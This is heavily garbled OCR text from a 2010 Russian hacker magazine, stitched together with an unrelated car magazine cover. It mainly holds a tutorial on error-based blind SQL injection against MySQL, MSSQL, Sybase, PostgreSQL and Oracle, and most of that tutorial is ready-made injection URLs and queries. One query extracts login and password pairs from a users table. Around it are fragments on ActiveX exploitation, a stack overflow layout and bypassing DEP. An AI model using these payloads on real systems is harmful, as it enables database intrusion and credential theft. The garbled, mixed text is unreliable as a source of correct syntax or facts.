тоже не нужен 

ѵиіп. ЗиЬтіРТоЕхргезз (ЬиІ) ; 



Кроме прочего, при фаззинге, благодоря 
ЕіІеМоп, были обнаружены небезопасные 
обращения к С:\31337.Ш. Например, метод 
ІтрогіВосІуТехС открывает и считывает 
содержимое файла, имя которого передается 
в параметре. Изучив свойства компонента, 
можем логично предположить, что считанное 
содержимое находится в свойстве ВобуТехЬ 



ѵиіп . ІтрогРВосІуТехк ( "С : \Ьооб . іпі " ) ; 
аіегб (ѵиіп. ВоЬуТехк) ; 



ВЫВОДЫ 

Вот и подошла к концу увлекательная статья 
о том, как добиться требуемого результата 
от браузера типа ІЕ 6/7 и уязвимого АсбѵеХ- 
компонента. Кроме обычных уязвимостей типа 
переполнения буфера или ошибки формата 
строки, особое внимание следует уделить 
небезопасным методам, которые позволяют 
получить доступ к рабочей станции клиента 
через браузер без всяких шеллкодов. Атаки 
на пользователей через браузер позволяют 
проникнуть во внутреннюю сеть компании, а 
также получить доступ ко многим критичным 
компонентам системы. В любом случае, люди, 
способные обнаружить, понять и использовать 
любые возможности системы, остаются в цене. 
Если тебе интересно исследовать возможно- 
сти различных систем, искать слабые места в 
коде, конфигурациях и реализациях ПО, то мы 
всегда рады видеть тебя среди членов наше- 
го коллеетива — исследовательского центра 
Оідііаі Эесигііу Резеагсб Огоир. Пиши нам на 
гезеагсЬйбзес.ги! ц-ц 
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Т САМЫЙ БЫСТРЫЙ ВАЗ РОССИИ 

ТУРБОВАЯ «ВОСЬМЕРКА» ИЗ ПОДМОСКОВЬЯ ЛОМАЕТ СТЕРЕОТИПЫ О ПЕРЕДНЕМ ПРИВОДЕ 




О ВАЗ-2108 - ВМШ Е36 - ТОѴОТА СЕНСА 
ШЗЗАЫ ЗКѴЬШЕ СТН - СНЕѴНОЕЕТ СЕОЕЕ 

срорсош 



РЕКОМЕНДОВАННАЯ ЦЕНА ЖУРНАЛА 100 РУБ. 



МАРТ ( 2010 І 02(66) 




О эстонский 

СЛИКОЕД 

ОСТЕРВЕНЕЛЫЙ ВМШЕ36 
ИЗ ТАЛЛИННА ПИТАЮЩИЙСЯ 
ПОКРЫШКАМИ! 

Ф КАРБОННАЯ 
ЧУМА 

ИСПАНСКАЯ ТОѴОТА 
СЕСІСА С НАЧИНКОЙ 
ИЗ УГЛЕРОДА, БУСТА 
И ДЕЦИБЕЛ' 



САМАЯ БОЙКАЯ ДЕВУШКА 
МИРЕ АВТОСПОРТА! 



к 












г- 



Оэпіса 



ЕЗДА 
В РЕЖИМЕ! 
ОВЕРБЮСТ 



ТТЛ 




ЖВЯРОДШ 



реклама 









ЕРРОР х ВА5Е0 5СИ--ІМЭЕСТЮЫ но- 



УЧИМСЯ 
НА ОШИБКАХ 

МЕТОДИКА ПРОВЕДЕНИЯ ЕШП-ВА5Е0 
ЗОЫШЕСТІОМ 



Довольно часто $Ш_-инъекцию можно обнаружить по сообщению 
об ошибке, выдаваемой базой данных, и не всегда использование 
уязвимости в подобных случаях возможно с применением классической 
техники эксплуатации (ипіоп). До некоторого времени в таких случаях 
приходилось пользоваться унылыми и медленными способами 
посимвольного перебора. Но зачем использовать неэффективный подход, 
когда возвращается ошибка СУБД?! 



Ведь ее не менее удобно, чем при класси- 
ческой эксплуатации 501-инъекций, можно 
приспособить к построчному чтению данных 
из базы или файловой системы. Глупо отка- 
зываться от такой возможности. Именно о 
способах, которые позволяют использовать 
сообщение об ошибке базы данных в качестве 
контейнера полезным данным, далее, и пой- 
дет речь в этой статье. 

ЕВВ0Р-ВАЗЕ0 вино 301. ІШЕСТІОЫ в мѵзш. 

В конце прошлого года Оѵѵагаг "достал из 
недр античата" универсальную технику экс- 
плуатации слепых 5С11_-инъекций в прило- 
жениях, функционирующих под управлением 
базы данных Му50І_. Надо сказать, достаточно 
непростая и непрозрачная техника. Пример 
использования универсального подхода для 
Му5С11_ >= 5.0: 



тузд1> зеіеск 1,2 ипіоп зеіеск со 
ипк (*) , сопсак (ѵегзіоп( ) , Поог (гап 
<3(0)*2))х Ггот іпГогтакіоп_зсЬета. 
каЫез дгоир Ьу х; 

ЕККОК 1062 (23000) : БирІісаГе 

епГгу '5.0.841' Гог кеу 1 
тузд1> зеіеск 1 апсі (зеіеск 1 
Ггот(зе1еск соипк (*) ,сопсак (ѵег 
зіоп() ,Г1оог(гап<3(0)*2) )х Ггот 
іпкогтакіоп_зсЬета. каЫез дгоир Ьу 
х) а) ; ЕККОК 1062 (23000): ШрІісаГе 
епГгу '5.0.841' Гог кеу 1 

В случае, если имя таблицы неизвестно 
(для Му50І_ < 5.0, например], то приходится 
использовать более сложные запросы, которые 
полностью завязаны на функции гапсІ(]. Это 
означает, что далеко не всегда удастся полу- 
чить желаемые данные в один ЬНр-запрос. 



щузді> зеіеск 1 апсі гото(1,1) > 

( зеіеск соипк ( * ) , сопсак ( ѵегзіоп ( ) , 0х 
За,Г1оог(гапсі() *2) )х ігош (зеіеск 1 
ипіоп зеіеск 2) а дгоир Ьу х Іітік 1) ; 

1 гом іп зек (0.00 зес) 

щузд1> зеіеск 1 апсі гото(1,1) > (зеіеск 
соипк ( * ) , сопсак (ѵегзіоп ( ) , 0x3а , Г Іоо 
г (гапсі( ) *2) )х Ггот (зеіеск 1 ипіоп 
зеіеск 2)а дгоир Ьу х Іітік 1); 

ЕККОК 1062 (23000): ШрІісаГе епГгу 
'5.0.84:0' Гог кеу 1 

Пример практического использования для 
восстановления структуры базы данных: 

Ъ.ГГр: //зегѵег/?іс!= (1) апс!(зе1есГ+1+Гг 
от(зе1есГ+соипГ (*) , сопсаГ ( (зеІесГ+Га 
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^ + 4 ^ КЪф://19?.16819І7/пядарЬр?іОе™і=(1)апс((5НесІ^01%2О:Ргат(5еІес*%2Осоип*іП^опса1]Сл 

Оиегу Ые4: Биріісай еойу 1 5.0.84Ѵ !ог кеу 1 

ѴѴатіпе: туз д1_пит_гош $ 0 зиррііегі аг^дтет із пос а ѵаіісі МуЗрІ гееиіггееоигсе іп /изг/іо саІАѵиѵг/гіаіа- гіізг/пелѵ^рЬр оп Ііпе 10 



Быстрая техника эксплуатации ЫіпсІ 50Ы в МуБОІ. 



Ъ1е_пате+СготЫпСогтаСіоп_зс]тета . СаЫез+1ітіС+0 
, 1 ) , Сіоог ( гапсі ( 0 ) *2 ) ) х+СготЫпСотаСіоп_зс]лета . 
СаЫез+дгоир+Ъу+х) а) — 

СШСр : / / зегѵег/ ? іс!= (1) апс!(зе1есС+1+Сгот(зе1есС 
+соипС ( * ) , сопсаС ( ( зе1есС+СаЫе_пате 
+СготЫпСогтаСіоп_зсСіета . СаЫез+1ітіС+1 ,1) , 

Сіоог (гапсі (0) *2) )х+Сгот 

+іпСогтаСіоп_зс1іета. СаЫез+дгоир+Ъу+х) а) — 

Способ Оѵѵагаг работает на всех версиях МуЗОЕ, включая 
и версию 3.x, которую по-прежнему еще можно встретить 
на просторах глобальной сети. Однако учитывая, что под- 
запросы появились, начиная только с МуЗОЕ версии 4.1, 
то это сильно уменьшает возможность применения ука- 
занного способа на более ранних версиях мускуля. 

УНИВЕРСАЛЬНЫЕ ТЕХНИКИ 
ДЛЯ ДРУГИХ БАЗ ДАННЫХ 

Не так давно хакером, скрывающимся под псевдо- 
нимом ТіпКобе, были успешно осуществлены атаки 
с использованием уязвимости ЫіпсІ ЗОБ-Іщесбоп на 
ѴѴеЬ-сервера в домене агту.тіі. При проведении атак 
на ѴѴеЬ-приложения, работающие под управлением 
М550Б 2000/2005, хакер продемонстрировал достаточно 
интересную технику получения данных из баз данных. 
Используемый способ ТіпКобе заключается в том, что 
М550Б ругается при некорректном переопределении типов 
данных, что в свою очередь позволяет "протащить" полез- 
ную нагрузку в возвращаемом сообщении об ошибке: 

зеІесС сопѵегС ( іпС , @@ѵегзіоп) ; 

Мзд 245, Ьеѵеі 16, ЗСаСе 1, Ьіпе 1 
Сопѵегзіоп Саііесі ѵ\йіеп сопѵегСіпд СЬе пѵагсЬаг 
ѵаіие 'МісгозоСС ЗОЬ Зегѵег 2008 (КТМ) - 
10.0.1600.22 ( ІпСеІ Х86) 

іТиІ 9 2008 14:43:34 
СоругідСШ (с) 1988-2008 МісгозоСС 
СогрогаСіоп 

ЕпСегргізе ЕсІіСіоп оп Шіпскжз Ш? 6.1 
<Х86> (ВиіІсЗ. 7600: ) (ѴМ) 

' Со сІаСа Суре іпС. 

Следовательно, при эксплуатации слепой 501-инъекции, 
с использованием данного подхода становится воз- 
можным, достаточно быстро получать нужные данные из 
Місгозоіі ЗОИ Зегѵег. Например, восстановить структуру 
базы данных можно следующим образом: 

СШСр: / /зегѵег/ ?іс!= (1) апсЦІ) Щ (сопѵегС (і 

пС , ( зе1есС + СаЫе_паше+Сгош ( зе1есС+гом_ 

питЬег ( ) +оѵег+ (огсіег+Ьу+СаЫе_ 

пате) +аз+гоѵтит, СаЫе_пате+Сгот+іпСогтаСіоп_ 

зсЬета . СаЫез ) +аз+С+Ыіеге+С . гоѵтит=1 ) ) ) -- 

СШСр: / /зегѵег/ ?Ы= (1) апсі(і) = (сопѵегС (і 

пС , ( зе1есС + СаЫе_пате+Сгот ( зе1есС+готщ_ 

питЬег ( ) +оѵег+ (огсіег+Ьу+СаЫе_ 

пате) +аз+гоѵтит, СаЫе_пате+Сгот+іпСогтаСіоп_ 

зсЬета. СаЫез) +аз+С+ѵ\Діеге+С . гоѵтит=2) ) ) -- 




Техника Оѵѵагаг работает и в МуЗСІІ. 3.x! 



Вспоминая о том, что ЗуЬазе АЗЕ, также как М3 ЗОБ 
Зегѵег, базируется на ТгапзаЫ-ЗОЕ, можно смело 
предположить, что приведенная техника выше распро- 
страняется также и на эту СУБД. Проверка полностью 
подтвердила это предположение (см. соответствующий 
скриншот). Все приводимые примеры для М550Б в 
полном объеме распространяются и на базу данных 
ЗуЬазе. 

Аналогичные махинации с приведением типов были 
повторены и в отношении мускуля. Проведенные 
эксперименты с ним показали, что при некоррект- 
ном переопределении типов МуЗОБ возвращает 
лишь не критическое уведомление об ошибке, кото- 
рое не позволяет дости гнуть аналогичных целей 
при эксплуатации ЫіпсІ ЗОБ ІщеЫіоп. А вот экспе- 
рименты с РозГдгеЗОБ удачно "выстрелили" в этом 
контексте: 




НТТР://ѴѴѴШ 



— 1 — Г 

> Ііпкз 

дѵѵа2аг.ги/?р=7 

Ьпкобе.Ьауѵѵогбз. 

сот . 



ѵЫЪ=# зеІесС сазС ( ѵегзіоп ( ) аз питегіс); 
ЕКК.ОК: іпѵаіісі іприС зупСах Сог Суре 

питегіс: " РозСдгеЗСЩ 8.2.13 оп І386- 

рогСЫЫСгееЪзсП . 2 , сотріІесЗ Ьу ССС сс 
(ССС) 4.2.1 20070719 [ЕгееВЗБ] " 



Для получения полезных данных при эксплуатации 50Б- 
инъекции содержащейся в приложении под управлением 
постгреса, можно использовать следующие запросы: 

СШСр: //зегѵег/ ?іс!= (1) апсі(і) =сазС 
( ( зе1есС+СаЫе_пате+Сгот+іпСогтаСіоп_зс]тета . 
СаЫез + 1ітіС + 1+оССзеС + 0 ) +аз+питегіс) -- 

СШСр: // зегѵег /?іс!= (1) апсі(і) =сазС 
( ( зе1есС+СаЫе_пате+Сгот+іпСогтаСіоп_зс]лета . 
СаЫез + ІітіС + І+оССзеС + 1 ) +аз+питегіс) -- 



В НЕДРАХ ОРАКЛЯТИНЫ 

Обладая интересной подборкой быстрых способов 
эксплуатации слепых ЗОБ-инъекций, мне недоставало 
аналогичных техник под не менее распространенную 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несет! 
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► Об5 





взлом 





$<ІІОигу1Я|1 - ||..4«іпіі1м1лг [52 Г 






зеіесь сопѵеіь [ іпь, Зв ѵегзіоп) 


І 




* | ГП 


► 




_1 Н«ой*| Йа К«ЦдвІ 






Над 24Б, Ьеѵеі 16, ЗСЛв 1, Ьіпе 1 


А 




Сопѵ*Г*іоп Г*іІ4й ЪК* гПг*гсЪ*г ѴВІМ* н Мі с г Л ЗОЬ 7003 (ЫЮ 

ОШ 3 2006 14 ■ 43: 34 

СоругідІіЪ [с) 198В-20ОЗ НісгсюіЬ Ссгроігісісп 

ЕпЪетртІБв оп НТ 6.1 <Х36> 7600: ( ГЛП 

к 


- 10.0.1600.22 (ІП 



' < : аЪс<іе:Е> ' ігош сіиаі)) ігот сіиаі; 
ЕККОК : 

ОКА-31011: ХМЬ рагзіпд іаііесі 
ОКА-19202: Еггог оссиггесі іп ХМЬ 
ргосеззіпд 

ЬРХ-00110: Шагпіпд: іпѵаіісі ОМате 
’’ : аЬссіе^" (поЬ а Ыате) 

30Ь> 




Вроде бы все замечательно, но есть несколь- 
ко подводных камней. Первая загвоздка 
заключается в том, что в оракле не проис- 
ходит автоматическое приведение типов. 
Поэтому такой запрос выдаст ошибку: 



8<2Ь> зеІесЬ * ігот изегз ѵіЬеге ісЗ. 
= 1 апсі(і) = (зеІесЬ ХМЬТуре ( ( зеІесЬ 
' < : аЪссіе:Е:> ' ігот сіиаі)) ігот 
сіиаі) ; 



Восстановление структуры базы данных М550І. через сообщение об 
ошибке 

^ Ф 4 ит«й(ін(, ©©ѵег*Гегг}- » Сеадіе 

МісгозсП СНЕ ОВ Ргсѵісіегйіг 501 Эегѵег еггог ТН3040&СТ 

Сопѵейіоп Таііей ѵкНеп ипѵеНіпд (Не пѵагсЬег *эвие ТМісгозоЙ 501 Земг 2606 (8 ГМ) -10.0 1600 22 0пІ«І Х86) ,ІиІ 0 2006 1^ 43 34 СоругідЫ (с) 
1063-2008 МІсгоеоІ Сѵрогаііоп. Епіегрлзе Е4іУоп оп ѴѴіпйо«5 МТ 0.1 сХ86> рлі(1 7600: ) (ѴМ) ‘ ю с1аг& іу|» іщ. 

/гпэзцІАпіасІ.азр. Ііпе 12 

Техника ТіпКосІе работает и в последней версии М550І./2008 



СУБД Огасіе. Это побудило меня прове- 
сти небольшой ресерч, направленный на 
поиск подобных техник в указанной базе 
данных. 

Убедившись в том, что все известные спо- 
собы эксплуатации еггог-Ьазеб ЫіпсІ 50І_ 
Іпіесііоп не работают в среде оракла, мое 
внимание привлекли функции взаимодей- 
ствия с форматом ХМІ_. Немного поковы- 
рявшись в них, была обнаружена функция 
ХМІ_Туре(], которая возвращает в сообщении 
об ошибке первый символ из запрашивае- 
мых данных (БРХ-00ХХХ): 

8<2Ь> зеІесЬ ХМЬТуре (( зеІесЬ 
'аЬсйе!' Ігош сіиаі)) Ігош сіиаі; 
ЕМКОЕ : 

ОКА-31011: ХМЬ рагзіпд іаііесі 
ОКА-19202: Еггог оссиггесі іп ХМЬ 
ргосеззіпд 

ЬРХ-00210: ехресЬесі '<' іпзЬеасі 
оі ' а ' 

Еггог аЬ Ііпе 1 

ОКА- 0 65 12: аЬ " ЗУЗ . ХМЬТУРЕ " , Ііпе 
301 

ОКА-06512: аЬ Ііпе 1 
по гоѵ^з зеІесЬес! 

30Ь> 



зиЬзЬг (ѵегзіоп, 2 , 1 ) ігош 
ѵ$іпзЬапсе) ) ігогп изегз; 
зеІесЬ ХМЬТуре ( (зеІесЬ 
зиЬзЬг (ѵегзіоп, 3 , 1) ігош 
ѵ$іпзЬапсе) ) ігош изегз; 
... и т . п. 



Считывание одного символа в один запрос 
при эксплуатации слепых 5СН_-инъекций 
— это здорово, но было бы глупо останав- 
ливаться на достигнутом, и мы пойдем 
несколько дальше. Копаясь в функции 
ХМІ_Туре(), мне удалось найти аналогичный 
способ проброса данных в сообщении об 
ошибке, который существует и в других 
базах данных: 



зеІесЬ * ігош изегз хУЬеге ісі = 

1 апсі(1) = (зеІесЬ ХМЬТуре (( зеІесЬ 
' < : аЪс<іе:Е> ' ігош сіиаі)) ігош сіиаі) 
ЕККОК аЬ Ііпе 1: 

СЖА-00932: іпсопзізЬепЬ сіаЬаЬурез : 
ехресЬесІ ШМВЕК доЬ - 

Второй нюанс заключается в том, что у 
ораклятины отсутствует Іігпіі: и оТТзеТ, что 
не позволяет простым путем осуществлять 
построчное чтение данных. И третья про- 
блема связана с тем, что функция ХМІ_Туре(] 



при обработке ошибки обрезает возвра- 
щаемые данные после некоторых символов. 
Например, когда в строке встречается пробел 
или символ аі: ("И") и другие. 

Но все можно разрулить;) Для решения про- 
блемы с приведением типов может исполь- 
зоваться функция иррег(). Организовать 
построчное чтение данных, можно с исполь- 
зованием следующей нехитрой конструкции: 



В ФУНКЦИИ ХМІТѴРЕ() МНЕ 
УДАЛОСЬ НАЙТИ АНАЛОГИЧНЫЙ 
СПОСОБ ПРОБРОСА ДАННЫХ 
В СООБЩЕНИИ ОБ ОШИБКЕ 



Уже хлеб. Используя функцию зиЬзІгО ста- 
новиться возможным посимвольное чтение 
требуемой информации. Например, можно 
достаточно быстро определить версию уста- 
новленной базы данных: 

зеІесЬ ХМЬТуре (( зеІесЬ 
зиЬзЬг (ѵегзіоп, 1 , 1) ігогп 
ѵ$іпзЬапсе) ) ігош изегз; 
зеІесЬ ХМЬТуре (( зеІесЬ 



8()Ь> зеІесЬ ХМЬТуре (( зеІесЬ 
' <аЬс<іеі : гооЬ> ' ігош сіиаі)) ігош 
сіиаі ; 

ЕККОК : 

ОКА-31011 : ХМЬ рагзіпд іаііесі 
ОКА-192 02: Еггог оссиггесі іп ХМЬ 
ргосеззіпд 

ЬРХ-00234: патезрасе ргеііх 
" аЬссіеі" із поЬ сіесіагесі 

8<2Ь> зеІесЬ ХМЬТуре (( зеІесЬ 



зеІесЬ ісі ігот ( зеІесЬ ісЦгошгит 
гпит ігош изегз а)ѵіЬеге гпит=1; 
зеІесЬ ісі ігот ( зеІесЬ ісДгошіит 
гпит ігот изегз а)мЬеге гпит=2 ; 

Ну, а для того, чтобы избежать потерю воз- 
вращаемых данных, может использоваться 
Ьех-кодирование. Опционально, можно 
также избавиться от кавычек в отправляемом 
запросе используя числовое представление 



► 066 
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^ ♦ 4 № / § НИр5//^еЫ«1/огэЛ«^рЬр?іс1=(1)апс)[1}=Сз€Еес^+иррег(хт11уре(сЬг{60}||сНг(53)]|сНі » Я боодіе 




\Ѵатше: осі ехесиІеП ГішісЕіоп осі-ехееізіеі: ОКА-3 10 11: сбой разбора ХМЬ ОКА- 1920 2: Возникла ошибка при обработке ХМЬ 



ЬРХ-001 10: \Ѵалііп§: недопустимый С^Кате ,1 ::61646В696ЕЗАЗА5040737377307264 П "не является Хате) Еггог аі Ііпе 1 ОКА-06512: 
на "$У$.ХШЛТРЕ\ Кие 301 ОКА-06512: на Ііпе 1 Іп С :\Іи еф иЬѴ^еЬіез1\ог а\+ез^рЬр оп Ііпе 17 



Ра!аІ еггог ОКА-3101 1: пае ба$аіба ХМЬ ОКА- 19202: Афёёёа іоёаёа Гбё іабааібёі ХМЬ ЕРХ-001 10: \Ѵапш§: іМібпдёійё рКате 
п 7.6 1 6460 696ЕЗ АЗА 5 040 737377307264" (іа уаёуабпу Хате) Еггог аі Ііпе 1 ОКА-06512: іа "ЯУЕ^ХМЬТУРЕ", Ііпе 301 ОКА-06512: іа Ііпе 
1 іп С:\ІпегриЬ\^еЬ№$і\ога\іе$*.рЬр оп ііпе 20 

Быстрая техника эксплуатации ЫіпсІ 50Ы в Огасіе 



501 Біг^істепія 



і з 

г 



:іесс Т Сгон иэесз иігеге ісі = 1 аиЩІ) ^сопѵеггЦіти С Ѳ ѵегзіоп) -- 



© 



Соиісі п оі ехесиЛй яаЬмпелг 
О»то* оолѵегі: ЧР0Л»2ФЗПюаН; 
5^СООЕ«-157 ( ОЮС 3 ^е="ШООб" 
Ііпе 1 , саіиптп 1 



эеіесъ ш Геои изегз ігііеге ій * 1 апй(і) »сопѵіеЕЬ(іііг; г Ё@иеі:зіоп) 



ш ІПРя-И. "*.»■! 



ии.^ и— х. 1 



"3 




Быстрая техника эксплуатации 
Ыіпсі 50Ы в РозідгеБОІ- 



3 ^ 



МЗЗ<2Ь: / ?рагат=1 

апсі (1) =сопѵегР ( іпР , ©©ѵегзіоп) - 



Быстрая техника эксплуатации ЫіпсІ БОЫ в БуЬазе 



символов (азсіі), что в перспективе позволит 
обходить фильтрацию при обработке поступа- 
ющих данных в приложение. Таким образом, 
конечный запрос примет следующий вид: 

зеіеср * Ргот ІаЫе ѵРЬеге ісі = 

1 апсі(і) = (зеіеср иррег (хтІРуре 
(сЬг(60) I | сЬг ( 58 ) I | сЬг ( 58 ) I I (з 
еіеср гаѵЩоЬех ( Іодіп | |сЬг(58) I 
|сЬг(58) I I раззтлгогсі) Ргот ( зеіеср 
Іодіп , раз зѵгогсі, гоѵтит гпит Ргот 
изегз а)ѵРЬеге гпит=1) | |сЬг(62))) 
Ргот сіиаі) ; 

зеіеср * Ргот ІаЫе ѵРЬеге ісі = 

1 апсі(і) = (зеіеср иррег (хтІРуре 
(сЬг(60) I | сЬг ( 58 ) I | сЬг ( 58 ) I I (з 
еіесР гачлШоЬех ( Іодіп | |сЬг(58) I 
|сЬг(58) I I раззтлгогсі) Ргот ( зеіеср 
Іодіп , раззчлгогсі, гоѵтит гпит Ргот 
изегз а)ѵРЬеге гпит=2 ) | | сЬг ( 62 ) ) ) 
Ргот сіиаі) ; 

Используя данную технику за один Ыір- 
запрос можно считывать до 214 байт в при- 
ложении (107 символов при использовании 
Ьех-кодирования], которое функционирует 
под управлением СУБД Огасіе >=9.0 и воз- 
вращает сообщение об ошибке (см. соответ- 
ствующий скриншот): 

ЬРРр: //зегѵег/?іс!= (1) апсі(і) = (зеіес 
Р+иррег (хтІРуре (сЬг (60) I |сЬг(58) I I 



сЪ.г(58) I I (зеіесР + гаѵЩоЬех (Іодіп | |с 
Ьг(58) I |сЪ.г(58) I I раззілгогсі) Ргот ( зеі 
есР + Іодіп, раз зѵгогсі , гохѵпит+гпит+Рго 
т+изегз+а) ѵРЬеге+гпит=1) | |сЬг(62))) 
Ргот сіиаі ) -- 

Для декодирования получаемых данных 
из приложения при эксплуатации 5(ЭІ_- 
инъекции описанным способом, в том числе, 
может использоваться стандартная функция 
оракла: 

8<2Ь> зеіеср иР1_гам. сазР_Ро_ѵагсЬ 
аг2 ( ' 61646Б696ЕЗАЗА504073737730726 
4') Ргот сіиаі; 

ІЛЪ_ВАМ . СА5Т_ТО_ѴАКСНАК2 ('61646069 
6ЕЗАЗА5 04 07373773 072 64 ' ) 

асітіп: :Р@ззѵ\Югс1 
30Ь> 

ПОДВОДЯ ИТОГИ 

Итого, мы получаем универсальные и 
быстрые техники эксплуатации еггог-Ьазеб 
ЫіпсІ БОБ Іщесііоп для следующих СУБД: 
РозІдгеБОБ, МББОБ, БуЬазе, а также для 
МуБОБ версии >=4.1 и Огасіе версии >=9.0. 
Для идентификации используемой версии 
базы данных в один ЫТр-запрос, могут при- 
меняться следующие конструкции: 

РозРдгеЗОЬ: /?рагаш=1 
апсі (1) =сазР (ѵегзіоп ( ) аз 
пишегіс ) -- 



ЗуЬазе: /?рагат=1 

апсі ( 1 ) =сопѵегР ( іпР , ©©ѵегзіоп) -- 

МуЗОЬ>=4 . 1<5 . 0 : /?рагат=(1) 

апсі (зеіеср 1 Ргот (зеіеср соипР 
( * ) , сопсаР (ѵегзіоп ( ) , Ріоог (гап 
сі ( 0 ) *2 ) ) х Ргот ТАВЬЕ_ЫАМЕ дгоир 
Ьу х ) а ) - - 
ИЛИ 

/?рагат=1 апсі гоѵ(1,1) > (зеіеср со 
ипР ( * ) , сопсаР (ѵегзіоп ( ) , 0x3а , Ріоог 
(гапсі ( ) *2 ) ) х Ргот (зеіеср 1 ипіоп 
зеіеср 2) а дгоир Ьу х ІітіР 1)-- 

МуЗОЬ>=5 . 0 : / ?рагат= ( 1 ) апсі (зеіеср 

1 Ргот (зеіеср соипР (*), сопсаР (ѵ 
егзіоп ( ) , Ріоог (гапсі ( 0 ) *2 ) ) х Ргот 
іпРогтаРіоп_зсЬета . РаЫез дгоир 
Ьу х ) а ) - - 

Огасіе >=9.0: /?рагат=1 

апсі ( 1) = ( зеіеср иррег (ХМЬТуре (сЬ 
г(60) I |сЬг(58) I |сЬг(58) I I (зеіес 
Р геріасе (Ьаппег,сЬг (32) ,сЬг(58) ) 
Ргот зуз . ѵ_$ѵегзіоп ілЛіеге 
гоѵс;пит=1 ) | | сЬг ( 62 ) ) ) Ргот сіиаі)-- 

ЗАНАВЕС 

Порой кажется, что все уже придумано до 
нас и нет смысла искать что-то новое. Как 
ты, наверное, заметил на примере развития 
направления по эксплуатации слепых 5СН_- 
инъекций — это не так. Всегда есть место 
для новых исследований. Удачных тебе 
хаков, и до новых встреч на страницах жур- 
нала ц-ц ! 
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ТЕОРИЯ И ПРАКТИКА ОБМАНА НАРБШЕ-ОЕР 

Сегодня твоему вниманию будет представлены методы обхода защиты, 
именуемой йЕР Некоторое время ее создатели были убеждены в 
надежности технологии, но их убеждениям суждено было рухнуть как 
карточный домик. Сейчас мы посмотрим на основные методы взлома РЕР 
и умело применим их на практике, а по ходу событий выясним, насколько 
осуществимы эти методы в жизни. 



В ПРЕДЫДУЩИХ СЕРИЯХ 

В прошлой статье мы научились обнаруживать 
и эксплуатировать уязвимости АсбѵеХ через 
интерфейс браузера типа ІЕ6/ІЕ7, использовать 
известную уязвимость на переполнение буфера 
в компоненте ОшскБоЙ ЕазуМаіІ ОЬіесІ: и даже 
нашли новую уязвимость небезопасного метода 
чтения, которая может привести к нарушению 
конфиденциальности и утечке чувствительной 
информации. Напомним, что вызов функции 
БиЬтіЕГоЕхргеззО со строкой более 256 байт 
переписывает адрес возврата, регистр Е5І, а 
также указатель и дескриптор БЕН. 

СССС...2 60...ССССАААА^^^^ВВВВ^^^^^^^^^ 

Е8І = АААА 
КЕТ = ВВВВ 
8ЕН = ББББ 

Мы написали два эксплойта, выполняющие 
Ьеар-зргау и передающие управление через 
БЕН дескриптор и через вызов САЕЕ [Е5І+СС] в 
коде уязвимой программы. Продолжим изуче- 
ние атак на клиентов через браузер на том же 



примере, но теперь усложним задачу, добавив 
защиту ОЕР (Оаіа Ехесибоп Ргеѵепбоп), которую 
мы попробуем обойти, используя вышеуказан- 
ную уязвимость переполнения буфера в стеке. 
Ни безопасные методы АсбѵеХ, ни ОЕР, ни 
другие технологии, вроде АБИР (Абсігезз зрасе 
Іауоиі гапсІотігаЕюп), понятное дело, спасти от 
этих бед не могут. Туг поможет только грамотное 
распределение прав. 

ШО 13 МІЗТЕР ОЕР? 

Многие из Вас уже конечно знают, что такое 
ЭЕР и с чем его едят, но собрать всю инфор- 
мацию в один абзац будет полезно, так сказать 
для напоминания. 

Итак, РЕР — это технология, компании 
Місгозоіф которая использует неиспользуемый 
в процессорах бит ЫХ/Хй (да, два названия... у 
АМО — ЫХ, у Ііпііеі — Хй] для «отметки» областей 
памяти. То есть, если в таблице разметки стра- 
ниц памяти этот бит будет установлен, то код в 
данной области не является исполняемым. И 
если каким-то чудом, регистр ЕІР указывает в 
такую область, то генерируется исключитель- 
ная ситуация и приложение с шумом вылетает 
(если, конечно, программист не установил 
обработчик). Соответственно, для того чтобы 



активировать ОЕР нужно иметь процессор с 
поддержкой ЫХ/йХ бита и ОС ѴѴіпбоѵѵз с под- 
держкой этой технологии (>= ѴѴіпбоѵѵз ХР 5Р2]. 
Также Місгозой позаботилась о тех обездолен- 
ных, у которых такого процессора нет — они 
смогут включить так называемый зоіТл/аге-ОЕР 
Только это не совсем так. Модное буквосочета- 
ние то же, но по факту — это другая технология, 
не связанная с битом и/или его эмуляцией. В 
данном случае просто используется защита от 
перезаписи БЕН дескриптора. Изначально эта 
технология называлась БаіюБЕН, и ее просто 
переименовали и подогнали под решение ОЕР 

АССЕ55 ѴІ0І.АТІ0Ы 

Что будет с нашими эксплойтами из предыду- 
щей статьи, если включить ЭЕР? Как сработает 
защита? Я отвечу на эти вопросы, но снача- 
ла расскажу, как запускать ОЕР Для начала 
необходимо убедиться, что наш процессор 
поддерживает эту технологию. Зайдем в ВІ05 
и посмотрим во вкладках, поддерживается 
ли необходимый бит защиты. Мой ІпІеІСоге2 
Оио — поддерживает, но по умолчанию отклю- 
чен. Это значит, что в таком варианте, можно 
использовать зо^ѵѵаге-ЭЕР — и очень легко 
обмануться (купил процессор с ЫХ/ХЭ битом, 
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врубил ВЕР, а это вовсе и не тот ВЕР :). Кстати, 
по умолчанию в ѴѴіпсІоѵѵз ХР, ВЕР также отклю- 
чен для всех процессов кроме самых важных. 

И ІЕ6/ІЕ7 таким процессом не считается. Это 
было сделано из соображений совместимости. 

Я не поленился и включил ВЕР для всех про- 
цессов. Сделать это можно в файле СЛЬооі 
іпі, или в свойствах «Моего Компьютера», 
вкладка «Дополнительно», кнопка «Параметры» 
в зоне «Быстродействие», а там вкладка 
«Предотвращение выполнения данных» — 
далее «Включить РЕР для всех программ и 
служб». Данный интерфейс является Егопі;- 
ЕпсГом для редактирования соответствующего 
параметра в СЛЬооЕіпі. Именно в этом файле 
задается политика РЕР: 

/поехесиЦе=ОрШп — значение по 
умолчанию для ХР/ѴізБа. БЕР только 
для системных процессов 




Параметры быстродействия 



Визуальные эффекты 



Дополнительно 



Предотвращение выполнения данных 

Предотвращение выполнения данных (ОЕР) помогает 
защитить компьютер от повреждения вирусами и при 
других угрозах безопасности > Как работает зто 

ШРЖХео? 



Включить ОЁР только для основных программ и служб 
Ѵ>/іпбоѵ/5 

о Включить ОЕР для всех программ и служб, кроме 
выбранных ниже; 



3 Ьооііпі - Блокнот 



Файл Правка Формат Вид Справка 



[Ьооі Іоасіег] 
гтт0оиг=ЗО 

гіе^аи]і=ти 1 гі (С 0 гіІ 5 кС 0 )гсіІ 5 к (О)раггіті оп( 1 )\шмооы 5 
[орегатіпа зузгепз] 

